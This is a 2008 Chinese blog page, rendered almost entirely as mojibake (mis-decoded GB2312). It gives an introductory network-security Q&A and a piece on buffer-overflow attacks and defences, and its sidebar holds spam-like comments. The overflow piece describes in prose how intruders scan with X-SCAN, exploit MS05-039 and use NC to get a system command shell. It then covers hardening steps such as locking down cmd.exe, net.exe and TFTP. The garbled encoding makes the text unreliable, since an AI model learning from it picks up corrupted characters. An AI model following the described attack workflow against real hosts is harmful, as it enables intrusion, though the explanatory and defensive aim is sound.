logo
¡¡ whois | dll-download | HandBook | ¹ØÓÚ±¾Õ¾ | ºǫ́¹ÜÀí  ¡¡
¡ô              
2008 Äê 5 ÔÂ
ÈÕ Ò» ¶þ Èý ËÄ Îå Áù
    123
45678910
11121314151617
18192021222324
25262728293031
ÉÏÔ MONTH ÏÂÔ¡¡¡¡ÉÏÒ»Äê YEAR ÏÂÒ»Äê

Óû§Ãû:
ÃÜ¡¡Âë:

¡¡Õ¾ÄÚËÑË÷
¡¡Í³¼ÆÐÅÏ¢
¹²ÓÐÎÄÕÂ: 647
¹²·ÃÎÊÊý: 9475493
½ñÈÕ·ÃÎÊ: 3649
ÔÚÏßÈËÊý: 1
¡¡×îÐÂÎÄÕÂ
¡¡½ñÌ죬ÎÒ³´¹ÉÁË
¡¡RedHat AS4 ÕûºÏMyS...
¡¡windows server 200...
¡¡Ê¹ÓÃfind²éÕÒÎļþµÄ...
¡¡Linux Ö¸Áî¼òµ¥½«¹¥...
¡¡LinuxÏÂÅäÖÃÍêÕû°²È...
¡¡¹ØÓÚÎÞ×é¼þÉÏ´«µÄAD...
¡¡ÓÖһƪviϸ½âÎÄÕÂ
¡¡viÌæ»»ÃüÁîÓ÷¨Ïê½â
¡¡squid-2.6.STABLE1Ö...
¡¡Áã³É±¾ LinuxÏÂÇáËÉ...
¡¡squidÓÖһƪÏêϸÅäÖ...
¡¡as4 ͨ¹ýyum×Ô¶¯Éý¼...
¡¡È«¹ú¸÷µØÍøÍ¨DNS
¡¡squidÓ¦ÓÃÏê½â
¡¡mysql³£ÓÃÃüÁî
¡¡ÐÞ¸´ Table 'xxx' i...
¡¡MYSQLÐÔÄÜÓÅ»¯ÉèÖÃ
¡¡Clamav + Amavisd-n...
¡¡amavisd-newÔÚ¸øÓʼ...
¡¡×îÐÂÆÀÂÛ
¡¡Hi there :))) I in...
¡¡·¢²¼Õß°®ºÃÕßÌṩ×î...
¡¡Hi all! Excellent ...
¡¡Best views O_O Mov...
¡¡µû·§¹«Ë¾£¬¹«Ë¾-Éó...
¡¡Congratulations!!!...
¡¡Good day... Moving...
¡¡ÉϺ£,Öܱßsnooker b...
¡¡Hi ^_^ Great .Now ...
¡¡Congratulations. C...
¡¡Hi there! Good wor...
¡¡Good day! Nice sit...
¡¡Hi 8-) Palatable w...
¡¡Ò×ͨ±¨¼Û£¬gate val...
¡¡Hi there - Thanks ...
¡¡°üÀ¨¹«ÒæÍøÌṩרҵ...
¡¡Hi all :))) The be...
¡¡Hello ^_^ Palatabl...
¡¡»¶Ó­·ÃÎÊ£¬
¡¡»¶Ó­·ÃÎÊ£¬
¡¡×îÐÂÒýÓÃ
¡¡×î½üÎÞÒýÓÃÄÚÈÝ
¡¡ÓÑÇéÁ´½Ó
-¡¡Ä¿Ç°ÎÞÓÑÇéÁ´½Ó (0)
¡¡ÎÄÕ¾ۺÏ
RSS View v:1.0 RSS View v:2.0
ATOM View v:0.3 channel
×î½ü 10 ÌõÆÀÂÛ RSS View Powered by Blog
Creative Commons DeCode: GB2312
PHP MySQL
¡¡[Õ¾³¤½éÉÜ]
Õ¾³¤£º Glen
ÐÅÏ䣺 root@domsn.net
http://wwww.domsn.net

One Step Ahead
ÍøÂ簲ȫÈëÃÅ֪ʶ16ÎÊ´ð    2007-03-25 00:07:47

ÎÊ:ʲôÊÇÍøÂ簲ȫ?

´ð:ÍøÂ簲ȫÊÇÖ¸ÍøÂçϵͳµÄÓ²¼þ¡¢Èí¼þ¼°ÆäϵͳÖеÄÊý¾ÝÊܵ½±£»¤£¬²»ÒòżȻµÄ»òÕß¶ñÒâµÄÔ­Òò¶øÔâµ½ÆÆ»µ¡¢¸ü¸Ä¡¢Ð¹Â¶£¬ÏµÍ³¿ÉÒÔÁ¬Ðø¿É¿¿Õý³£µØÔËÐУ¬ÍøÂç·þÎñ²»±»Öжϡ£

ÎÊ:ʲôÊǼÆËã»ú²¡¶¾?

´ð:¼ÆËã»ú²¡¶¾(Computer Virus)ÊÇÖ¸±àÖÆÕßÔÚ¼ÆËã»ú³ÌÐòÖвåÈëµÄÆÆ»µ¼ÆËã»ú¹¦ÄÜ»òÕßÆÆ»µÊý¾Ý£¬Ó°Ïì¼ÆËã»úʹÓò¢ÇÒÄܹ»×ÔÎÒ¸´ÖƵÄÒ»×鼯Ëã»úÖ¸Áî»òÕß³ÌÐò´úÂë¡£

ÎÊ:ʲôÊÇľÂí?

´ð:ľÂíÊÇÒ»ÖÖ´øÓжñÒâÐÔÖʵÄÔ¶³Ì¿ØÖÆÈí¼þ¡£Ä¾ÂíÒ»°ã·ÖΪ¿Í»§¶Ë(client)ºÍ·þÎñÆ÷¶Ë(server)¡£¿Í»§¶Ë¾ÍÊDZ¾µØÊ¹Óõĸ÷ÖÖÃüÁîµÄ¿ØÖÆÌ¨£¬·þÎñÆ÷¶ËÔòÊÇÒª¸ø±ðÈËÔËÐУ¬Ö»ÓÐÔËÐйý·þÎñÆ÷¶ËµÄ¼ÆËã»ú²ÅÄܹ»ÍêÈ«Êܿء£Ä¾Âí²»»áÏñ²¡¶¾ÄÇÑùÈ¥¸ÐȾÎļþ¡£

ÎÊ:ʲôÊÇ·À»ðǽ?ËüÊÇÈçºÎÈ·±£ÍøÂ簲ȫµÄ?

´ð:ʹÓ÷À»ðǽ(Firewall)ÊÇÒ»ÖÖÈ·±£ÍøÂ簲ȫµÄ·½·¨¡£·À»ðǽÊÇÖ¸ÉèÖÃÔÚ²»Í¬ÍøÂç(Èç¿ÉÐÅÈÎµÄÆóÒµÄÚ²¿ÍøºÍ²»¿ÉÐŵĹ«¹²Íø)»òÍøÂ簲ȫÓòÖ®¼äµÄһϵÁв¿¼þµÄ×éºÏ¡£ËüÊDz»Í¬ÍøÂç»òÍøÂ簲ȫÓòÖ®¼äÐÅÏ¢µÄΩһ³öÈë¿Ú£¬Äܸù¾ÝÆóÒµµÄ°²È«Õþ²ß¿ØÖÆ(ÔÊÐí¡¢¾Ü¾ø¡¢¼à²â)³öÈëÍøÂçµÄÐÅÏ¢Á÷£¬ÇÒ±¾Éí¾ßÓнÏÇ¿µÄ¿¹¹¥»÷ÄÜÁ¦¡£ËüÊÇÌṩÐÅÏ¢°²È«·þÎñ£¬ÊµÏÖÍøÂçºÍÐÅÏ¢°²È«µÄ»ù´¡ÉèÊ©¡£

ÎÊ:ʲôÊǺóÃÅ?Ϊʲô»á´æÔÚºóÃÅ?

´ð:ºóÃÅ(Back Door)ÊÇÖ¸Ò»ÖÖÈÆ¹ý°²È«ÐÔ¿ØÖƶø»ñÈ¡¶Ô³ÌÐò»òϵͳ·ÃÎÊȨµÄ·½·¨¡£ÔÚÈí¼þµÄ¿ª·¢½×¶Î£¬³ÌÐòÔ±³£»áÔÚÈí¼þÄÚ´´½¨ºóÃÅÒÔ±ã¿ÉÒÔÐ޸ijÌÐòÖеÄȱÏÝ¡£Èç¹ûºóÃű»ÆäËûÈËÖªµÀ£¬»òÊÇÔÚ·¢²¼Èí¼þ֮ǰûÓÐɾ³ý£¬ÄÇôËü¾Í³ÉÁ˰²È«Òþ»¼¡£

ÎÊ:ʲô½ÐÈëÇÖ¼ì²â??

´ð:ÈëÇÖ¼ì²âÊÇ·À»ðǽµÄºÏÀí²¹³ä£¬°ïÖúϵͳ¶Ô¸¶ÍøÂç¹¥»÷£¬À©Õ¹ÏµÍ³¹ÜÀíÔ±µÄ°²È«¹ÜÀíÄÜÁ¦(°üÀ¨°²È«É󼯡¢¼àÊÓ¡¢½ø¹¥Ê¶±ðºÍÏìÓ¦)£¬Ìá¸ßÐÅÏ¢°²È«»ù´¡½á¹¹µÄÍêÕûÐÔ¡£Ëü´Ó¼ÆËã»úÍøÂçϵͳÖеÄÈô¸É¹Ø¼üµãÊÕ¼¯ÐÅÏ¢£¬²¢·ÖÎöÕâЩÐÅÏ¢£¬¼ì²éÍøÂçÖÐÊÇ·ñÓÐÎ¥·´°²È«²ßÂÔµÄÐÐΪºÍÔ⵽Ϯ»÷µÄ¼£Ïó

ÎÊ:ʲô½ÐÊý¾Ý°ü¼à²â?ËüÓÐʲô×÷ÓÃ?

´ð:Êý¾Ý°ü¼à²â¿ÉÒÔ±»ÈÏΪÊÇÒ»¸ùÇÔÌýµç»°ÏßÔÚ¼ÆËã»úÍøÂçÖеĵȼÛÎï¡£µ±Ä³ÈËÔÚ¡°¼àÌý¡±ÍøÂçʱ£¬ËûÃÇʵ¼ÊÉÏÊÇÔÚÔĶÁºÍ½âÊÍÍøÂçÉÏ´«Ë͵ÄÊý¾Ý°ü¡£Èç¹ûÄãÐèÒªÔÚ»¥ÁªÍøÉÏͨ¹ý¼ÆËã»ú·¢ËÍÒ»·âµç×ÓÓʼþ»òÇëÇóÏÂÔØÒ»¸öÍøÒ³£¬ÕâЩ²Ù×÷¶¼»áʹÊý¾Ýͨ¹ýÄãºÍÊý¾ÝÄ¿µÄµØÖ®¼äµÄÐí¶à¼ÆËã»ú¡£ÕâЩ´«ÊäÐÅϢʱ¾­¹ýµÄ¼ÆËã»ú¶¼Äܹ»¿´µ½Äã·¢Ë͵ÄÊý¾Ý£¬¶øÊý¾Ý°ü¼à²â¹¤¾ß¾ÍÔÊÐíijÈ˽ػñÊý¾Ý²¢ÇҲ鿴Ëü¡£

ÎÊ:ʲôÊÇNIDS?

´ð:NIDSÊÇNetwork Intrusion Detection SystemµÄËõд£¬¼´ÍøÂçÈëÇÖ¼ì²âϵͳ£¬Ö÷ÒªÓÃÓÚ¼ì²âHacker»òCrackerͨ¹ýÍøÂç½øÐеÄÈëÇÖÐÐΪ¡£NIDSµÄÔËÐз½Ê½ÓÐÁ½ÖÖ£¬Ò»ÖÖÊÇÔÚÄ¿±êÖ÷»úÉÏÔËÐÐÒÔ¼à²âÆä±¾ÉíµÄͨÐÅÐÅÏ¢£¬ÁíÒ»ÖÖÊÇÔÚһ̨µ¥¶ÀµÄ»úÆ÷ÉÏÔËÐÐÒÔ¼à²âËùÓÐÍøÂçÉ豸µÄͨÐÅÐÅÏ¢£¬±ÈÈçHub¡¢Â·ÓÉÆ÷¡£

ÎÊ:ʲô½ÐSYN°ü?

´ð:TCPÁ¬½ÓµÄµÚÒ»¸ö°ü£¬·Ç³£Ð¡µÄÒ»ÖÖÊý¾Ý°ü¡£SYN¹¥»÷°üÀ¨´óÁ¿´ËÀàµÄ°ü£¬ÓÉÓÚÕâЩ°ü¿´ÉÏÈ¥À´×Ôʵ¼Ê²»´æÔÚµÄÕ¾µã£¬Òò´ËÎÞ·¨ÓÐЧ½øÐд¦Àí¡£

ÎÊ:¼ÓÃܼ¼ÊõÊÇָʲô?

´ð:¼ÓÃܼ¼ÊõÊÇ×î³£Óõݲȫ±£ÃÜÊֶΣ¬ÀûÓü¼ÊõÊֶΰÑÖØÒªµÄÊý¾Ý±äΪÂÒÂë(¼ÓÃÜ)´«ËÍ£¬µ½´ïÄ¿µÄµØºóÔÙÓÃÏàͬ»ò²»Í¬µÄÊֶλ¹Ô­(½âÃÜ)¡£

¼ÓÃܼ¼Êõ°üÀ¨Á½¸öÔªËØ:Ëã·¨ºÍÃÜÔ¿¡£Ëã·¨Êǽ«ÆÕͨµÄÐÅÏ¢»òÕß¿ÉÒÔÀí½âµÄÐÅÏ¢ÓëÒ»´®Êý×Ö(ÃÜÔ¿)½áºÏ£¬²úÉú²»¿ÉÀí½âµÄÃÜÎĵIJ½Ö裬ÃÜÔ¿ÊÇÓÃÀ´¶ÔÊý¾Ý½øÐбàÂëºÍ½âÃܵÄÒ»ÖÖËã·¨¡£ÔÚ°²È«±£ÃÜÖУ¬¿Éͨ¹ýÊʵ±µÄÔ¿¼ÓÃܼ¼ÊõºÍ¹ÜÀí»úÖÆÀ´±£Ö¤ÍøÂçµÄÐÅϢͨÐŰ²È«¡£

ÎÊ:ʲô½ÐÈ䳿²¡¶¾?

´ð:È䳿²¡¶¾(Worm)Ô´×ÔµÚÒ»ÖÖÔÚÍøÂçÉÏ´«²¥µÄ²¡¶¾¡£1988Ä꣬22ËêµÄ¿µÄζû´óѧÑо¿ÉúÂÞ²®ÌØ¡£ÄªÀï˹(Robert Morris)ͨ¹ýÍøÂç·¢ËÍÁËÒ»ÖÖרΪ¹¥»÷UNIXϵͳȱÏÝ¡¢ÃûΪ¡°È䳿¡±(Worm)µÄ²¡¶¾¡£È䳿Ôì³ÉÁË6000¸öϵͳ̱»¾£¬¹À¼ÆËðʧΪ200Íòµ½6000ÍòÃÀÔª¡£ÓÉÓÚÕâÖ»È䳿µÄµ®Éú£¬ÔÚÍøÉÏ»¹×¨ÃųÉÁ¢Á˼ÆËã»úÓ¦¼±Ð¡×é(CERT)¡£ÏÖÔÚÈ䳿²¡¶¾¼Ò×åÒѾ­×³´óµ½³ÉǧÉÏÍòÖÖ£¬²¢ÇÒÕâǧÍòÖÖÈ䳿²¡¶¾´ó¶¼³ö×ÔºÚ¿ÍÖ®ÊÖ¡£

ÎÊ:ʲôÊDzÙ×÷ϵͳÐͲ¡¶¾?ËüÓÐʲôΣº¦?

´ð:ÕâÖÖ²¡¶¾»áÓÃËü×Ô¼ºµÄ³ÌÐò¼ÓÈë²Ù×÷ϵͳ»òÕßÈ¡´ú²¿·Ö²Ù×÷ϵͳ½øÐй¤×÷£¬¾ßÓкÜÇ¿µÄÆÆ»µÁ¦£¬»áµ¼ÖÂÕû¸öϵͳ̱»¾¡£¶øÇÒÓÉÓÚ¸ÐȾÁ˲Ù×÷ϵͳ£¬ÕâÖÖ²¡¶¾ÔÚÔËÐÐʱ£¬»áÓÃ×Ô¼ºµÄ³ÌÐòƬ¶ÏÈ¡´ú²Ù×÷ϵͳµÄºÏ·¨³ÌÐòÄ£¿é¡£¸ù¾Ý²¡¶¾×ÔÉíµÄÌØµãºÍ±»Ìæ´úµÄ²Ù×÷ϵͳÖкϷ¨³ÌÐòÄ£¿éÔÚ²Ù×÷ϵͳÖÐÔËÐеĵØÎ»Óë×÷Óã¬ÒÔ¼°²¡¶¾È¡´ú²Ù×÷ϵͳµÄÈ¡´ú·½Ê½µÈ£¬¶Ô²Ù×÷ϵͳ½øÐÐÆÆ»µ¡£Í¬Ê±£¬ÕâÖÖ²¡¶¾¶ÔϵͳÖÐÎļþµÄ¸ÐȾÐÔÒ²ºÜÇ¿¡£

ÎÊ:ĪÀï˹È䳿ÊÇָʲô?ËüÓÐÊ²Ã´ÌØµã?

´ð:ËüµÄ±àдÕßÊÇÃÀ¹ú¿µÄ˶û´óѧһÄê¼¶Ñо¿ÉúÂÞÌØ¡£ÄªÀï˹¡£Õâ¸ö³ÌÐòÖ»ÓÐ99ÐУ¬ÀûÓÃÁËUnixϵͳÖеÄȱµã£¬ÓÃFingerÃüÁî²éÁª»úÓû§Ãûµ¥£¬È»ºóÆÆÒëÓû§¿ÚÁÓÃMailϵͳ¸´ÖÆ¡¢´«²¥±¾ÉíµÄÔ´³ÌÐò£¬ÔÙ±àÒëÉú³É´úÂë¡£

×î³õµÄÍøÂçÈ䳿Éè¼ÆÄ¿µÄÊǵ±ÍøÂç¿ÕÏÐʱ£¬³ÌÐò¾ÍÔÚ¼ÆËã»ú¼ä¡°Óε´¡±¶ø²»´øÀ´ÈκÎË𺦡£µ±ÓлúÆ÷¸ººÉ¹ýÖØÊ±£¬¸Ã³ÌÐò¿ÉÒÔ´Ó¿ÕÏмÆËã»ú¡°½èÈ¡×ÊÔ´¡±¶ø´ïµ½ÍøÂçµÄ¸ºÔØÆ½ºâ¡£¶øÄªÀï˹È䳿²»ÊÇ¡°½èÈ¡×ÊÔ´¡±£¬¶øÊÇ¡°ºÄ¾¡ËùÓÐ×ÊÔ´¡±¡£

ÎÊ:ʲôÊÇDDoS?Ëü»áµ¼ÖÂʲôºó¹û?

´ð:DDoSÒ²¾ÍÊÇ·Ö²¼Ê½¾Ü¾ø·þÎñ¹¥»÷¡£ËüʹÓÃÓëÆÕͨµÄ¾Ü¾ø·þÎñ¹¥»÷ͬÑùµÄ·½·¨£¬µ«ÊÇ·¢Æð¹¥»÷µÄÔ´ÊǶà¸ö¡£Í¨³£¹¥»÷ÕßʹÓÃÏÂÔØµÄ¹¤¾ßÉøÍ¸ÎÞ±£»¤µÄÖ÷»ú£¬µ±»ñµÃ¸ÃÖ÷»úµÄÊʵ±µÄ·ÃÎÊȨÏ޺󣬹¥»÷ÕßÔÚÖ÷»úÖа²×°Èí¼þµÄ·þÎñ»ò½ø³Ì(ÒÔϼò³Æ´úÀí)¡£ÕâЩ´úÀí±£³Ö˯Ãß״̬£¬Ö±µ½´ÓËüÃǵÄÖ÷¿Ø¶ËµÃµ½Ö¸Á¶ÔÖ¸¶¨µÄÄ¿±ê·¢Æð¾Ü¾ø·þÎñ¹¥»÷¡£Ëæ×ÅΣº¦Á¦¼«Ç¿µÄºÚ¿Í¹¤¾ßµÄ¹ã·º´«²¥Ê¹Ó㬷ֲ¼Ê½¾Ü¾ø·þÎñ¹¥»÷¿ÉÒÔͬʱ¶ÔÒ»¸öÄ¿±ê·¢Æð¼¸Ç§¸ö¹¥»÷¡£µ¥¸öµÄ¾Ü¾ø·þÎñ¹¥»÷µÄÍþÁ¦Ò²Ðí¶Ô´ø¿í½Ï¿íµÄÕ¾µãûÓÐÓ°Ï죬¶ø·Ö²¼ÓÚÈ«ÇòµÄ¼¸Ç§¸ö¹¥»÷½«»á²úÉúÖÂÃüµÄºó¹û¡£

ÎÊ:¾ÖÓòÍøÄÚ²¿µÄARP¹¥»÷ÊÇָʲô?

´ð:ARPЭÒéµÄ»ù±¾¹¦ÄܾÍÊÇͨ¹ýÄ¿±êÉ豸µÄIPµØÖ·£¬²éѯĿ±êÉ豸µÄMACµØÖ·£¬ÒÔ±£Ö¤Í¨ÐŵĽøÐС£

»ùÓÚARPЭÒéµÄÕâÒ»¹¤×÷ÌØÐÔ£¬ºÚ¿ÍÏò¶Ô·½¼ÆËã»ú²»¶Ï·¢ËÍÓÐÆÛÕ©ÐÔÖʵÄARPÊý¾Ý°ü£¬Êý¾Ý°üÄÚ°üº¬ÓÐÓ뵱ǰÉè±¸ÖØ¸´µÄMacµØÖ·£¬Ê¹¶Ô·½ÔÚ»ØÓ¦±¨ÎÄʱ£¬ÓÉÓÚ¼òµ¥µÄµØÖ·Öظ´´íÎó¶øµ¼Ö²»ÄܽøÐÐÕý³£µÄÍøÂçͨÐÅ¡£Ò»°ãÇé¿öÏ£¬Êܵ½ARP¹¥»÷µÄ¼ÆËã»ú»á³öÏÖÁ½ÖÖÏÖÏó:

1.²»¶Ïµ¯³ö¡°±¾»úµÄXXX¶ÎÓ²¼þµØÖ·ÓëÍøÂçÖеÄXXX¶ÎµØÖ·³åÍ»¡±µÄ¶Ô»°¿ò¡£

2.¼ÆËã»ú²»ÄÜÕý³£ÉÏÍø£¬³öÏÖÍøÂçÖжϵÄÖ¢×´¡£

ÒòΪÕâÖÖ¹¥»÷ÊÇÀûÓÃARPÇëÇó±¨ÎĽøÐС°ÆÛÆ­¡±µÄ£¬ËùÒÔ·À»ðǽ»áÎóÒÔΪÊÇÕý³£µÄÇëÇóÊý¾Ý°ü£¬²»ÓèÀ¹½Ø¡£Òò´ËÆÕͨµÄ·À»ðǽºÜÄѵֵ²ÕâÖÖ¹¥»÷¡£

ÎÊ:ʲô½ÐÆÛÆ­¹¥»÷?ËüÓÐÄÄЩ¹¥»÷·½Ê½?

´ð:ÍøÂçÆÛÆ­µÄ¼¼ÊõÖ÷ÒªÓÐ:HONEYPOTºÍ·Ö²¼Ê½HONEYPOT¡¢ÆÛÆ­¿Õ¼ä¼¼ÊõµÈ¡£Ö÷Òª·½Ê½ÓÐ:IPÆÛÆ­¡¢ARPÆÛÆ­¡¢DNSÆÛÆ­¡¢WebÆÛÆ­¡¢µç×ÓÓʼþÆÛÆ­¡¢Ô´Â·ÓÉÆÛÆ­(ͨ¹ýÖ¸¶¨Â·ÓÉ£¬ÒÔ¼ÙðÉí·ÝÓëÆäËûÖ÷»ú½øÐкϷ¨Í¨ÐÅ»ò·¢Ëͼٱ¨ÎÄ£¬Ê¹Êܹ¥»÷Ö÷»ú³öÏÖ´íÎó¶¯×÷)¡¢µØÖ·ÆÛÆ­(°üÀ¨Î±ÔìÔ´µØÖ·ºÍαÔìÖмäÕ¾µã)µÈ¡£

ÍøÂç¡°Òç³ö¹¥»÷¡±¹¥·À¼

Ëæ×ÅÍøÂçÆÕ¼°£¬´óÁ¿¹«¿ªµÄShellcode(¡°Òç³ö¡±´úÂë)ÓëÒç³ö¹¥»÷Ô­Àí¶¼ÄÜÔÚ¸÷´ó°²È«ÍøÕ¾ÖÐÕÒµ½£¬Ò²ÓÉ´ËÑÜÉúÁËһϵÁа²È«Òþ»¼£¬ºÜ¶àÉÔ΢Á˽âÍøÂ簲ȫ֪ʶµÄÈ˶¼¿ÉÒÔÀûÓÃÏֳɵĹ¥»÷Èí¼þÇáÒ×·¢¶¯Òç³ö¹¥»÷»ñµÃ·þÎñÆ÷ȨÏÞ¡£

1.ʲôÊÇ¡°Òç³ö¹¥»÷¡±£¿

¡°Òç³ö¹¥»÷¡±¾ÍÏñÊǽ«ºÜ¶àɳ×Óµ¹Èë×°ÂúË®µÄÈÝÆ÷ʱ£¬Ë®¾Í»áÒç³öÀ´Ò»Ñù¡£Ä¿Ç°£¬´ó¶àÒç³ö¹¥»÷¶¼ÊÇÕë¶Ô»º³åÇøµÄÒç³ö¡£µ±»º³åÇøÒç³öʱ£¬¹ýÊ£µÄÐÅÏ¢¶ÔµçÄÔÄÚ´æÖÐÔ­ÓÐÄÚÈݽøÐÐÍêÈ«Ìæ»»£¬Èçδ½øÐб¸·Ý£¬ÄãµÄÄÚÈݾÍÓÀÔ¶¶ªÊ§ÁË¡£

ÏÖÔÚÍøÉϹ«²¼µÄ¹¥»÷³ÌÐò²»½ö¾ßÓÐÆÆ»µÎļþµÄ¹¦ÄÜ£¬Ò»°ã»¹»áµÃµ½ÏµÍ³È¨ÏÞµÄCMDSHELL(¹ÜÀíÃüÁîÐÐ)£¬ÄÇËüÓÖÊÇÈçºÎʵÏÖµÄÄØ£¿¡°Òç³ö¹¥»÷¡±ÔÚ¶Ô»º³åÇøÖеÄÎļþ½øÐÐÌæ»»µÄͬʱ£¬»¹»áÖ´ÐÐһЩ·Ç·¨³ÌÐò£¬´Ó¶øµÃµ½ÃüÁîÐÐϵĹÜÀíԱȨÏÞ£¬Ö®ºó¹¥»÷ÕßÔÙͨ¹ýÃüÁîÐн¨Á¢¹ÜÀíÔ±Õ˺ţ¬¶ÔµçÄÔ½øÐпØÖÆ¡£

2.¡°Òç³ö¹¥»÷¡±µÄʵÏÖ

Ò»°ãÈëÇÖÕßÔÚÍøÉÏÁ˽â»ò·¢ÏÖÁË¿ÉÒÔ½øÐÐÒç³ö¹¥»÷µÄ©¶´ºó£¬Ê¹ÓÃȱÏÝɨÃèÆ÷(ÈçÈ«ÃæÉ¨ÃèµÄX-SCAN¡¢Õë¶Ôµ¥Ò»Â©¶´É¨ÃèµÄIIS WEBDAVµÈ¹¤¾ß)ÕÒµ½²¢È·ÈÏ´æÔÚÔ¶³ÌÒç³ö©¶´µÄµçÄÔ£¬½Ó×űãʹÓÃÀûÓù¥»÷´úÂë±à³Ì³É¹¦µÄExploit(¹¥»÷³ÌÐò)·¢ËÍShellcode¹¥»÷£¬È·ÈÏÔ¶³ÌÒç³ö³É¹¦ºóʹÓÃNC»òTELNETµÈ³ÌÐòÁ¬½Ó±»Òç³öÖ÷»úµÄ¶Ë¿Ú´Ó¶øµÃµ½CMDSHELL¡£

±ÈÈçǰ¶Îʱ¼äΣº¦Ìرð´óµÄMS05039Òç³ö©¶´£¬¾ÍÊÇÏÈÀûÓÃMS05039ScanÀ´É¨ÃèÓЩ¶´µÄµçÄÔ£¬È»ºó´ò¿ªÁ½¸öÃüÁîÌáʾ·û´°¿Ú£¬Ò»¸öÓÃÀ´µÃµ½CMDSHELLµÄNC£¬Ò»¸öÖ´ÐÐÒç³ö¹¥»÷³ÌÐò£¬µ±Ö´Ðй¥»÷³ÌÐòºó£¬¾ÍµÃµ½ÁËϵͳȨÏÞµÄCMDSHELL¡£

3.ÈçºÎ¶ÔÒç³ö¹¥»÷½øÐзÀ»¤£¿

˵µ½·À»¤£¬Ê×Ïȶ¨Ê±¸üÐÂÓÐЧ²¹¶¡¡£µ«Èç¹û¹¥»÷ÕßÓõÄÊÇÉÐδ·¢²¼²¹¶¡µÄ¹¥»÷³ÌÐòÄØ£¿ËùÒÔ´ò²¹¶¡ÊÇÓÐЧ£¬µ«²»ÊÇΩһµÄ·½·¨¡£ÏÂÃæ¾ÍÀ´¿´¿´ÈçºÎÊÖ¶¯ÉèÖ㬶ÔÒç³ö¹¥»÷½øÐзÀÓù¡£

µÚÒ»²½£ºÔÚWindows 2000/2003£¬¿ÉÒÔ½¨Á¢Ò»¸öÓû§£¬Èçboxer£¬ÃÜÂë×îºÃÓôóÓÚ8λµÄÊý×ÖÓë×ÖĸµÄ»ìºÏ·½Ê½£¬¶øÇÒÈç¹û¾õµÃ»¹²»¹»Ç¿×³£¬¿ÉÒÔÔÚÓû§µÄÃû³ÆÇ°Ãæ¼ÓÉÏÒ»¸ö$¡£ÕâÑù£¬¿ÉÒÔ½¨Á¢Ò»¸öÒþ²ØÕË»§£¬ÈëÇÖʱ¹¥»÷ÕßÎÞ·¨ÀûÓá°net user boxer password¡±ÃüÁîÀ´ÐÞ¸ÄÕâ¸öÓû§µÄÃÜÂë¡£ÁíÍâÇ¿µ÷Ò»µã£¬ÄǸöÓû§±ØÐëÊÇUSER×éµÄ¡£

µÚ¶þ²½£º¶ÔÓÚWindows 2000/2003£¬½¨Á¢Óû§ºó£¬´ò¿ªC:\WINNT\System32(ϵͳ°²×°ÔÚCÅÌ)£¬ÕÒµ½cmd.exe£¬ÓÃÓÒ¼üÑ¡Ôñ¡°ÊôÐÔ¡±ÏÔÚ¡°°²È«¡±±êÇ©ÏÂÐÞ¸Äcmd.exeµÄ·ÃÎÊȨÏÞ£¬Ö»±£Áô¸Õ¸Õн¨Á¢µÄboxerÓû§¶Ôcmd.exeµÄÍêÈ«¿ØÖÆÈ¨ÏÞ£¬½«ÆäËûÓû§È«²¿É¾³ý£¬ÓÈÆäÊÇEveryone¡£Ö®ºó£¬ÕÒµ½net.exeÎļþ£¬°´ÕÕcmd.exeµÄ·½·¨½øÐÐÉèÖã¬Èç¹ûÔÚÕÒµ½net.exeµÄͬʱ£¬»¹·¢ÏÖÁËnet1.exe£¬Ò²ÒªÒ»Í¬ÉèÖÃÒ»ÑùµÄȨÏÞ£¬Íê³ÉÉÏÊöÏÞÖÆºó£¬×î»ù±¾µÄ·ÀÓù´ëÊ©¾ÍÍê³ÉÁË¡£

ÔÚWindows XPÏ£¬cmd.exeµÄ¡°ÊôÐÔ¡±Ñ¡ÏîÀïÒѾ­Ã»ÓÐÁË¡°°²È«¡±±êÇ©£¬¿ÉÒÔµã»÷¡°¿ªÊ¼¡úÔËÐС±£¬ÊäÈëgpedit.msc£¬´ò¿ª¡°×é²ßÂÔ¡±´°¿Ú¡£ÔÚ×é²ßÂÔÖУ¬ÒÀ´ÎÕ¹¿ª¡°¼ÆËã»úÅäÖáúWindows ÉèÖáúÈí¼þÏÞÖÆ²ßÂÔ¡±£¬ÓÒ»÷ºó£¬Ñ¡Ôñ¡°´´½¨ÐµIJßÂÔ¡±¡£È»ºó£¬¼ÌÐøÕ¹¿ª¡°Èí¼þÏÞÖÆ²ßÂÔ¡úÆäËû¹æÔò¡±ÏÓÒ»÷¸ÃÏѡÔñ¡°Ð¼üÉ¢ÁйæÔò¡±¡£ÔÚµ¯³ö´°¿ÚÖеã»÷¡°ä¯ÀÀ¡±°´Å¥£¬Ñ¡ÔñC:\WINNT\System32ϵÄcmd.exeÎļþ£¬ÉèÖá°°²È«¼¶±ð¡±Îª¡°²»ÔÊÐíµÄ¡±¡£¶Ônet.exeÎļþÖ´ÐÐͬÑùµÄ²Ù×÷£¬½øÐÐÏÞÖÆ¡£

Windows XPÖо­¹ýÉèÖúóÈκÎÓû§½«²»Äܵ÷ÓÃcmd.exeºÍnet.exeÃüÁîÁË¡£´Ë·½·¨Ö»ÊʺÏÔÚÒç³ö³ÌÐò±»·¢²¼ºóûÓÐÏà¹ØµÄ²¹¶¡Çé¿öϽøÐÐÓ¦¼±·À»¤£¬Èç¹ûÓû§²»ÐèÒªÓõ½cmd.exe¼°net.exeÃüÁî¡£ÍÆ¼ö´ËÀûÓ÷½Ê½½ûÖ¹ÔËÐС£

ÁíÍ⻹ÓÐÒ»ÖÖÇé¿ö¾ÍÊÇһЩ¹¥»÷Õß¿ÉÄÜͨ¹ýÆäËû;¾¶µÃµ½Óû§µçÄÔÉÏijЩÈí¼þµÄ²Ù¿ØÈ¨ÏÞ£¬ÈçFTP·þÎñ¡¢WEB·þÎñµÈ£¬ÔÚÕâÖÖÇé¿öϺܿÉÄܳöÏÖÀûÓÃWindowsϵͳ±¾ÉíµÄTFTP·þÎñ½øÐÐľÂíÉÏ´«»ò±¾µØÒç³ö³ÌÐò¡£ËùÒÔ£¬×îºóÔÙÀ´½²½âһϷÀÖ¹¹¥»÷ÕßÀûÓÃTFTP:½øÈëC:\WINNT\System32\Drivers\Etc£¬Óá°¼Çʱ¾¡±´ò¿ªÎļþservices£¬°ÑTFTP¶Ë¿Ú¸ÄΪ0¡£ÕâÑù£¬¹¥»÷Õß¾ÍÎÞ·¨Í¨¹ýʹÓÃTFTPÖ¸Áî´«ÊäÒç³ö³ÌÐòÁË¡£µ±È»£¬ÎªÁ˸üºÃµÄ°²È«ÐÔ£¬Ò²¿ÉÒÔ½«TFTP.EXEÎļþ£¬°´Ç°Ãæ½éÉܵķ½·¨£¬Ìí¼Ó